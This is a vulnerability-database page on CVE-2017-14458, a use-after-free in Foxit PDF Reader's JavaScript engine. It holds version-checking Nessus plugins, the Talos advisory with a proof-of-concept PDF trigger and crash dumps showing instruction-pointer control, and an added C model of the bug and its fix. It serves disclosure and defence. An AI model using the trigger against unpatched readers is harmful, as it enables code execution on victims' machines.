CVE-2017-14458 - Use After Free vulnerability in Foxit PDF Reader 8.3.2.25013
Attack vector | NETWORK |
Attack complexity | LOW |
Privileges required | NONE |
Confidentiality impact | HIGH |
Integrity impact | HIGH |
Availability impact | HIGH |
Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 1 |
Common Weakness Enumeration (CWE)
Nessus
NASL family | Windows |
NASL id | FOXIT_PHANTOM_8_3_6.NASL |
description | According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 119837 |
published | 2018-12-21 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/119837 |
title | Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities |

code:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(119837);
  script_version("1.3");
  script_cvs_date("Date: 2019/10/31 15:18:52");

  script_cve_id(
    "CVE-2017-14458",
    "CVE-2017-17557",
    "CVE-2018-3842",
    "CVE-2018-3843",
    "CVE-2018-3850",
    "CVE-2018-3853",
    "CVE-2018-10302",
    "CVE-2018-10303"
  );
  script_bugtraq_id(103942, 103999);

  script_name(english:"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities");
  script_summary(english:"Checks the version of Foxit PhantomPDF.");

  script_set_attribute(attribute:"synopsis", value:"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 8.3.6. It is, therefore, affected by multiple vulnerabilities.");
  # https://www.foxitsoftware.com/support/security-bulletins.php
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2f244c3e");
  script_set_attribute(attribute:"solution", value:"Upgrade to Foxit PhantomPDF version 8.3.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-3853");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/05/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/05/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/12/21");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantom");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:phantompdf");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("foxit_phantom_installed.nasl");
  script_require_keys("installed_sw/FoxitPhantomPDF");

  exit(0);
}

include('vcf.inc');

app = 'FoxitPhantomPDF';
app_info = vcf::get_app_info(app:app, win_local:TRUE);

# Vulnerable range: 8.0 up to and including 8.3.5.30351; fixed in 8.3.6.
constraints = [{ 'min_version' : '8.0', 'max_version' : '8.3.5.30351', 'fixed_version' : '8.3.6' }];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
```
NASL family | Windows |
NASL id | FOXIT_READER_9_1_0_5096.NASL |
description | The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. |
last seen | 2020-04-30 |
modified | 2018-04-27 |
plugin id | 109399 |
published | 2018-04-27 |
reporter | This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/109399 |
title | Foxit Reader < 9.1 Multiple Vulnerabilities |

code:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(109399);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/04/27");

  script_cve_id(
    "CVE-2017-14458",
    "CVE-2017-17557",
    "CVE-2018-3842",
    "CVE-2018-3850",
    "CVE-2018-3853"
  );
  script_bugtraq_id(103942);
  script_xref(name:"ZDI", value:"ZDI-18-312");
  script_xref(name:"ZDI", value:"ZDI-18-313");
  script_xref(name:"ZDI", value:"ZDI-18-315");
  script_xref(name:"ZDI", value:"ZDI-18-329");
  script_xref(name:"ZDI", value:"ZDI-18-330");
  script_xref(name:"ZDI", value:"ZDI-18-331");
  script_xref(name:"ZDI", value:"ZDI-18-332");
  script_xref(name:"ZDI", value:"ZDI-18-335");
  script_xref(name:"ZDI", value:"ZDI-18-339");
  script_xref(name:"ZDI", value:"ZDI-18-340");
  script_xref(name:"ZDI", value:"ZDI-18-341");
  script_xref(name:"ZDI", value:"ZDI-18-342");
  script_xref(name:"ZDI", value:"ZDI-18-344");
  script_xref(name:"ZDI", value:"ZDI-18-345");
  script_xref(name:"ZDI", value:"ZDI-18-346");
  script_xref(name:"ZDI", value:"ZDI-18-348");
  script_xref(name:"ZDI", value:"ZDI-18-349");
  script_xref(name:"ZDI", value:"ZDI-18-350");
  script_xref(name:"ZDI", value:"ZDI-18-351");
  script_xref(name:"ZDI", value:"ZDI-18-352");
  script_xref(name:"ZDI", value:"ZDI-18-354");
  script_xref(name:"ZDI", value:"ZDI-18-358");
  script_xref(name:"ZDI", value:"ZDI-18-359");

  script_name(english:"Foxit Reader < 9.1 Multiple Vulnerabilities");
  script_summary(english:"Checks the version of Foxit Reader.");

  script_set_attribute(attribute:"synopsis", value:"A PDF viewer installed on the remote Windows host is affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:"The version of Foxit Reader installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"see_also", value:"https://www.foxitsoftware.com/support/security-bulletins.php");
  script_set_attribute(attribute:"solution", value:"Upgrade to Foxit Reader version 9.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-14458");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/19");
  script_set_attribute(attribute:"patch_publication_date", value:"2018/04/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/27");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:foxitsoftware:foxit_reader");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("foxit_reader_installed.nasl");
  script_require_keys("installed_sw/Foxit Reader");

  exit(0);
}

include('vcf.inc');

app = 'Foxit Reader';
app_info = vcf::get_app_info(app:app, win_local:TRUE);

# Vulnerable range: 9.0 up to (but not including) the fixed build 9.1.0.5096.
constraints = [{ 'min_version' : '9.0', 'fixed_version' : '9.1.0.5096' }];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);
```
NASL family | Windows |
NASL id | FOXIT_PHANTOM_9_1_0_5096.NASL |
description | According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 109398 |
published | 2018-04-27 |
reporter | This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/109398 |
title | Foxit PhantomPDF < 9.1 Multiple Vulnerabilities |

NASL family | Windows |
NASL id | FOXIT_PHANTOM_9_1_0.NASL |
description | According to its version, the Foxit PhantomPDF application (formerly known as Phantom) installed on the remote Windows host is prior to 9.1. It is, therefore, affected by multiple vulnerabilities. |
last seen | 2020-04-30 |
modified | 2018-12-21 |
plugin id | 119838 |
published | 2018-12-21 |
reporter | This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/119838 |
title | Foxit PhantomPDF < 9.1 Multiple Vulnerabilities |
Seebug
bulletinFamily | exploit |
id | SSV:97301 |
last seen | 2018-06-08 |
modified | 2018-05-17 |
published | 2018-05-17 |
reporter | Knownsec |
title | Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability (CVE-2017-14458) |

description:

### Summary

An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 8.3.2.25013. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

### Tested Versions

Foxit Software Foxit PDF Reader 8.3.2.25013.

### Product URLs

https://www.foxitsoftware.com/products/pdf-reader/

### CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

### CWE

CWE-416: Use After Free

### Details

Foxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe's Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface.

When executing embedded JavaScript code, a document can be closed, which essentially frees a lot of used objects, but the JavaScript can continue to execute. Invoking a method which keeps a stale reference to a now-freed object can lead to a use-after-free condition, which can be abused to execute arbitrary code.

This particular vulnerability lies in the this.search.query() method, which triggers a use-after-free condition when the following code is executed in a regular PDF document:

```
7 0 obj
<< >>
stream
this.closeDoc();
this.search.query( );
endstream
endobj
```

Opening this proof-of-concept PDF document in Foxit Reader with PageHeap enabled results in the following crash:

```
(498.14fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader_Lib_Full.exe -
eax=00000000 ebx=21152ff8 ecx=107f0de8 edx=00000000 esi=1b630ff8 edi=037def5c
eip=01562a78 esp=037ded5c ebp=037dedb0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58:
01562a78 8b11            mov     edx,dword ptr [ecx]  ds:002b:107f0de8=????????
0:000> !heap -p -a ecx
    address 107f0de8 found in
    _DPH_HEAP_ROOT @ d4f1000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                   107414e0:         107f0000             2000
    6bf4ab22 verifier!AVrfDebugPageHeapFree+0x000000c2
    77c158e8 ntdll!RtlDebugFreeHeap+0x0000003c
    77bc5bed ntdll!RtlpFreeHeap+0x0005616d
    77b6fa0d ntdll!RtlFreeHeap+0x000007cd
    0075bd5b FoxitReader_Lib_Full+0x005cbd5b
    002bb657 FoxitReader_Lib_Full+0x0012b657
    002be4d5 FoxitReader_Lib_Full+0x0012e4d5
    0046596c FoxitReader_Lib_Full+0x002d596c
    0046568f FoxitReader_Lib_Full+0x002d568f
    0047d114 FoxitReader_Lib_Full+0x002ed114
    005ca8e6 FoxitReader_Lib_Full+0x0043a8e6
    0045c7ad FoxitReader_Lib_Full+0x002cc7ad
    0045c4bf FoxitReader_Lib_Full+0x002cc4bf
    005c043e FoxitReader_Lib_Full+0x0043043e
    005ba7f6 FoxitReader_Lib_Full+0x0042a7f6
    005be7b7 FoxitReader_Lib_Full+0x0042e7b7
    005be846 FoxitReader_Lib_Full+0x0042e846
    751ee0bb USER32!_InternalCallWinProc+0x0000002b
    751f8849 USER32!InternalCallWinProc+0x00000020
    751fb145 USER32!UserCallWinProcCheckWow+0x000001be
    751e8503 USER32!DispatchClientMessage+0x000001b3
    751e8aa0 USER32!__fnDWORD+0x00000050
    77ba0bad ntdll!KiUserCallbackDispatcher+0x0000004d
    751db95b USER32!SendMessageW+0x0000005b
    00459022 FoxitReader_Lib_Full+0x002c9022
    005c0667 FoxitReader_Lib_Full+0x00430667
    005ba7f6 FoxitReader_Lib_Full+0x0042a7f6
    005be7b7 FoxitReader_Lib_Full+0x0042e7b7
    005be846 FoxitReader_Lib_Full+0x0042e846
    751ee0bb USER32!_InternalCallWinProc+0x0000002b
    751f8849 USER32!InternalCallWinProc+0x00000020
    751fb145 USER32!UserCallWinProcCheckWow+0x000001be
```

Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the next few instructions we can see the following:

```
0:000> u
FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c58:
01562a78 8b11            mov     edx,dword ptr [ecx]
01562a7a 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
01562a7d 8b8254020000    mov     eax,dword ptr [edx+254h]
01562a83 ffd0            call    eax
```

We can observe from the above listing that the twice-dereferenced address from ecx, through edx+0x254, ends up in eax, which is then used as the target of the call instruction. This makes this vulnerability easy to exploit, since we can control the contents of ecx. With a bit of memory layout control, and with PageHeap off, we can get full EIP control:

```
(2ac4.25e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FoxitReader_Lib_Full.exe -
eax=41414141 ebx=0c6d5a60 ecx=0c665a20 edx=0c6b3948 esi=0c6d5950 edi=044ff464
eip=41414141 esp=044ff260 ebp=044ff2b8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
41414141 ??              ???
0:000> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
03aff0fc 01562a85 0x41414141
03aff158 01668d7f FoxitReader_Lib_Full!CryptUIWizExport+0x5b0c65
03aff200 01668632 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6f5f
03aff2b4 005a1a57 FoxitReader_Lib_Full!CryptUIWizExport+0x6b6812
03aff2ec 01425a6e FoxitReader_Lib_Full+0x411a57
03aff320 0141d876 FoxitReader_Lib_Full!CryptUIWizExport+0x473c4e
03aff388 0141fc23 FoxitReader_Lib_Full!CryptUIWizExport+0x46ba56
03aff398 1640a0d6 FoxitReader_Lib_Full!CryptUIWizExport+0x46de03
03aff3b8 16444b63 0x1640a0d6
```

Closing the document via JavaScript frees objects, but JavaScript continues to execute, and some stale references can cause a use after free, which is what happens in this case. Since the memory pointed at by ecx is freed, careful heap manipulation can put it under attacker control, indirectly giving control over eax and leading to arbitrary code execution.

### Timeline

* 2017-12-12 - Vendor Disclosure
* 2017-12-12 - Discussion with vendor on issues
* 2018-01-29 - Vendor advised issue fixed in code scheduled for next release early April
* 2018-04-01 - Vendor pushed release to mid April
* 2018-04-19 - Vendor patch released
* 2018-04-19 - Public disclosure
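The close-then-query sequence the advisory describes, modelled in C as an added example (not Foxit's code and not part of the Talos report): a document owns a Search object whose method is dispatched through a function-pointer slot, and the script-side handle keeps pointing at that object across close, as `this.search` does across `this.closeDoc()`. The vulnerable variant frees the object at close and leaves the handle dangling, which is the `mov edx,[ecx]; call [edx+254h]` shape in the crash above. The hardened variant gives the script handle shared ownership (so the memory cannot be freed while the script still holds it) and makes close detach the object (so a later query is refused instead of dispatched). All type and function names are invented for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model, not Foxit's code: a document owns a Search object and a
 * script-side handle also points at it. Every name here is invented. */

typedef struct Search {
    int refcount;
    int detached;                                        /* set when the owning document closes */
    int (*query)(struct Search *self, const char *text); /* vtable-like slot, like [edx+254h] above */
} Search;

typedef struct Document {
    Search *search;
    int closed;
} Document;

typedef struct ScriptHandle {
    Search *search; /* the reference the script keeps across closeDoc() */
} ScriptHandle;

static int g_live_search = 0; /* outstanding Search allocations, for leak checks */

static int search_query_impl(Search *self, const char *text) {
    (void)self;
    return (int)strlen(text); /* stand-in for real search work */
}

static Search *search_new(void) {
    Search *s = calloc(1, sizeof *s);
    if (!s) abort();
    s->refcount = 1;
    s->query = search_query_impl;
    g_live_search++;
    return s;
}

static void search_release(Search *s) {
    if (s && --s->refcount == 0) { g_live_search--; free(s); }
}

/* --- vulnerable pattern: close frees, the script handle is left dangling --- */

void doc_close_vulnerable(Document *d) {
    free(d->search); /* memory gone, but any ScriptHandle still points here */
    d->search = NULL;
    d->closed = 1;
}

int handle_query_vulnerable(ScriptHandle *h, const char *text) {
    /* After doc_close_vulnerable() this reads freed memory and calls through it.
       Kept only for comparison: main() and the tests never run it. */
    return h->search->query(h->search, text);
}

/* --- hardened pattern: shared ownership plus an explicit liveness check --- */

static void doc_open(Document *d) {
    d->search = search_new();
    d->closed = 0;
}

static ScriptHandle handle_acquire(Document *d) {
    ScriptHandle h = { d->search };
    h.search->refcount++; /* the script now co-owns the object */
    return h;
}

static void handle_release(ScriptHandle *h) {
    search_release(h->search);
    h->search = NULL;
}

static void doc_close(Document *d) {
    if (d->closed) return;
    d->search->detached = 1;   /* object stays allocated but is no longer usable */
    search_release(d->search); /* drop only the document's own reference */
    d->search = NULL;
    d->closed = 1;
}

/* Returns the query result, or -1 if the document was closed underneath the script. */
static int handle_query(ScriptHandle *h, const char *text) {
    if (!h->search || h->search->detached) return -1;
    return h->search->query(h->search, text);
}

/* Scenario mirroring the proof of concept: closeDoc() and then search.query(). */
int scenario_query_after_close(void) {
    Document d;
    doc_open(&d);
    ScriptHandle h = handle_acquire(&d);
    doc_close(&d);                      /* this.closeDoc();      */
    int r = handle_query(&h, "needle"); /* this.search.query(..) */
    handle_release(&h);                 /* last reference: freed here, not at close */
    return r;
}

/* Normal use: query while the document is still open. */
int scenario_query_open(void) {
    Document d;
    doc_open(&d);
    ScriptHandle h = handle_acquire(&d);
    int r = handle_query(&h, "needle");
    handle_release(&h);
    doc_close(&d);
    return r;
}

int live_search_objects(void) { return g_live_search; }

int main(void) {
    printf("query while open: %d\n", scenario_query_open());
    printf("query after close: %d\n", scenario_query_after_close());
    printf("leaked search objects: %d\n", live_search_objects());
    return 0;
}
```

The two halves of the fix are deliberately separate: reference counting answers "is the memory still valid", the `detached` flag answers "is the object still meaningful". Either one alone is not enough, since a refcount without the flag lets a script keep driving a half-torn-down object, and a flag without ownership leaves the freed-memory read the crash dump shows. On the operational side, the page's own Nessus plugins detect exposure purely by installed version, which is the right signal here because the fix shipped only as the 9.1 / 8.3.6 builds.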
Talos
id | TALOS-2017-0506 |
last seen | 2019-05-29 |
published | 2018-04-19 |
reporter | Talos Intelligence |
source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506 |
title | Foxit PDF Reader Javascript Search Query Remote Code Execution Vulnerability |
References
- http://www.securityfocus.com/bid/103942
- http://www.securitytracker.com/id/1040733
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0506